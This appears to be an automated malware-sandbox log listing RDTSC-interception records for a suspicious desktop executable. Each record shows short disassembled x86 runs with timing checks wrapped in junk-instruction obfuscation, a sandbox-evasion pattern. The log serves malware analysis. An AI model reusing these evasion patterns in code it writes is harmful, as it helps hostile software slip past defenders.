Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101B9 second address: 70101CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEEDCB2F2EAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70101CE second address: 7010209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [772406ECh] 0x0000000f jmp 00007FEEDCB1F6E6h 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FEEDCB1F6DAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010209 second address: 701020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701020D second address: 7010213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010213 second address: 7010231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEEDCB30137h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010231 second address: 7010237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010237 second address: 701023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701032B second address: 701032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701032F second address: 7010335 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701041D second address: 701047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEDCB1F6E5h 0x00000009 add ecx, 62F68AE6h 0x0000000f jmp 00007FEEDCB1F6E1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FEEDCB1F6E0h 0x0000001b add cx, E688h 0x00000020 jmp 00007FEEDCB1F6DBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov dword ptr [esi+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701047C second address: 7010482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010482 second address: 70104A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FEEDCB1F6DDh 0x00000014 push ecx 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70104A6 second address: 7010502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEDCB2F2ECh 0x00000013 adc ch, 00000078h 0x00000016 jmp 00007FEEDCB2F2EBh 0x0000001b popfd 0x0000001c mov ah, 09h 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+4Ch] 0x00000022 jmp 00007FEEDCB2F2EBh 0x00000027 mov dword ptr [esi+10h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FEEDCB2F2F5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010502 second address: 7010508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010508 second address: 7010567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b jmp 00007FEEDCB2F2EFh 0x00000010 mov dword ptr [esi+14h], eax 0x00000013 pushad 0x00000014 mov ebx, ecx 0x00000016 pushad 0x00000017 mov ax, 59BDh 0x0000001b mov esi, 742ED4B9h 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+54h] 0x00000025 jmp 00007FEEDCB2F2F4h 0x0000002a mov dword ptr [esi+18h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FEEDCB2F2F7h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010567 second address: 701057F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701057F second address: 70105C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f mov cl, 4Dh 0x00000011 popad 0x00000012 mov dword ptr [esi+1Ch], eax 0x00000015 jmp 00007FEEDCB2F2F1h 0x0000001a mov eax, dword ptr [ebx+5Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FEEDCB2F2F3h 0x00000025 mov ecx, 333DA7DFh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70105C4 second address: 70105D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70105D8 second address: 70105DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70105DC second address: 7010652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c mov dh, cl 0x0000000e popad 0x0000000f mov eax, dword ptr [ebx+60h] 0x00000012 pushad 0x00000013 push edx 0x00000014 mov di, ax 0x00000017 pop ecx 0x00000018 pushfd 0x00000019 jmp 00007FEEDCB1F6E9h 0x0000001e sbb cl, 00000016h 0x00000021 jmp 00007FEEDCB1F6E1h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+24h], eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FEEDCB1F6DCh 0x00000032 or cx, 1E38h 0x00000037 jmp 00007FEEDCB1F6DBh 0x0000003c popfd 0x0000003d mov ch, CCh 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+64h] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010652 second address: 7010656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010656 second address: 701065A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701065A second address: 7010660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010660 second address: 7010666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010666 second address: 701066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701066A second address: 70106A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FEEDCB1F6E6h 0x00000014 xor ax, C2F8h 0x00000019 jmp 00007FEEDCB1F6DBh 0x0000001e popfd 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70106A3 second address: 70106B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70106B7 second address: 70106BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70106BB second address: 701073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+68h] 0x0000000b jmp 00007FEEDCB2F2F7h 0x00000010 mov dword ptr [esi+2Ch], eax 0x00000013 pushad 0x00000014 mov cl, 3Ah 0x00000016 pushfd 0x00000017 jmp 00007FEEDCB2F2F1h 0x0000001c or esi, 382FA3A6h 0x00000022 jmp 00007FEEDCB2F2F1h 0x00000027 popfd 0x00000028 popad 0x00000029 mov ax, word ptr [ebx+6Ch] 0x0000002d jmp 00007FEEDCB2F2EEh 0x00000032 mov word ptr [esi+30h], ax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FEEDCB2F2F7h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701073D second address: 7010743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010743 second address: 701076C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+00000088h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FEEDCB2F2EBh 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701076C second address: 7010771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010771 second address: 7010776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010776 second address: 7010791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov word ptr [esi+32h], ax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, 799Bh 0x00000015 mov esi, 3BED1477h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010791 second address: 70107E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f pushad 0x00000010 jmp 00007FEEDCB2F2ECh 0x00000015 pushfd 0x00000016 jmp 00007FEEDCB2F2F2h 0x0000001b xor esi, 5FF32AC8h 0x00000021 jmp 00007FEEDCB2F2EBh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+34h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70107E4 second address: 70107FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70107FF second address: 7010805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010805 second address: 7010809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010809 second address: 701080D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 701080D second address: 7010843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007FEEDCB1F6E7h 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FEEDCB1F6DBh 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010843 second address: 7010875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEDCB2F2F0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEDCB2F2F7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010875 second address: 70108BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5DEAh 0x00000007 pushfd 0x00000008 jmp 00007FEEDCB1F6DBh 0x0000000d or eax, 03199E8Eh 0x00000013 jmp 00007FEEDCB1F6E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+3Ch], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FEEDCB1F6DDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70108BD second address: 70108CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70108CD second address: 7010906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 pushfd 0x00000012 jmp 00007FEEDCB1F6E4h 0x00000017 add esi, 477E3E98h 0x0000001d jmp 00007FEEDCB1F6DBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010906 second address: 70109AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c jmp 00007FEEDCB2F2EEh 0x00000011 lea eax, dword ptr [ebx+00000080h] 0x00000017 jmp 00007FEEDCB2F2F0h 0x0000001c push 00000001h 0x0000001e jmp 00007FEEDCB2F2F0h 0x00000023 nop 0x00000024 jmp 00007FEEDCB2F2F0h 0x00000029 push eax 0x0000002a jmp 00007FEEDCB2F2EBh 0x0000002f nop 0x00000030 jmp 00007FEEDCB2F2F6h 0x00000035 lea eax, dword ptr [ebp-10h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FEEDCB2F2F7h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109AC second address: 70109B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109B2 second address: 70109B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109B6 second address: 70109C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109C5 second address: 70109C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109C9 second address: 70109CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 70109CD second address: 70109D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010A16 second address: 7010A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010A2E second address: 7010A58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEEDCB2F2F5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010A58 second address: 7010AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEDCB1F6E7h 0x00000009 or cx, A7BEh 0x0000000e jmp 00007FEEDCB1F6E9h 0x00000013 popfd 0x00000014 mov ah, 71h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test edi, edi 0x0000001b jmp 00007FEEDCB1F6E3h 0x00000020 js 00007FEF4CCCE2EDh 0x00000026 jmp 00007FEEDCB1F6E6h 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FEEDCB1F6E7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010AE4 second address: 7010B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 mov bl, 3Ch 0x00000015 popad 0x00000016 lea eax, dword ptr [ebx+78h] 0x00000019 jmp 00007FEEDCB2F2ECh 0x0000001e push 00000001h 0x00000020 jmp 00007FEEDCB2F2F0h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FEEDCB2F2EAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B2A second address: 7010B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B39 second address: 7010B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B5D second address: 7010B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010B63 second address: 7010BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1386h 0x00000007 pushfd 0x00000008 jmp 00007FEEDCB2F2F7h 0x0000000d xor eax, 134E8A0Eh 0x00000013 jmp 00007FEEDCB2F2F9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010BAC second address: 7010BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010BB0 second address: 7010BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010BC3 second address: 7010C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEDCB1F6DCh 0x00000013 xor esi, 2BFE2E18h 0x00000019 jmp 00007FEEDCB1F6DBh 0x0000001e popfd 0x0000001f mov ecx, 232E51CFh 0x00000024 popad 0x00000025 nop 0x00000026 pushad 0x00000027 mov bh, ch 0x00000029 push edx 0x0000002a mov edx, ecx 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 movzx esi, dx 0x00000033 movsx edi, cx 0x00000036 popad 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FEEDCB1F6DBh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010C54 second address: 7010C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010C5A second address: 7010C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010C67 second address: 7010CBE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEEDCB2F2EBh 0x00000008 sbb cx, A2FEh 0x0000000d jmp 00007FEEDCB2F2F9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 test edi, edi 0x0000001a pushad 0x0000001b call 00007FEEDCB2F2F8h 0x00000020 mov ah, 76h 0x00000022 pop edx 0x00000023 pushad 0x00000024 mov si, AC79h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010CBE second address: 7010D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007FEF4CCCE0CBh 0x0000000c jmp 00007FEEDCB1F6E2h 0x00000011 mov eax, dword ptr [ebp-04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov edi, 2C7CE3A0h 0x0000001c pushfd 0x0000001d jmp 00007FEEDCB1F6E9h 0x00000022 sub cx, 5AA6h 0x00000027 jmp 00007FEEDCB1F6E1h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010D19 second address: 7010D7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FEEDCB2F2EEh 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 jmp 00007FEEDCB2F2F0h 0x00000019 push 00000001h 0x0000001b jmp 00007FEEDCB2F2F0h 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FEEDCB2F2F7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 7010D7E second address: 7010DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEEDCB1F6E1h 0x0000000f nop 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEEDCB1F6DAh 0x00000018 rdtsc
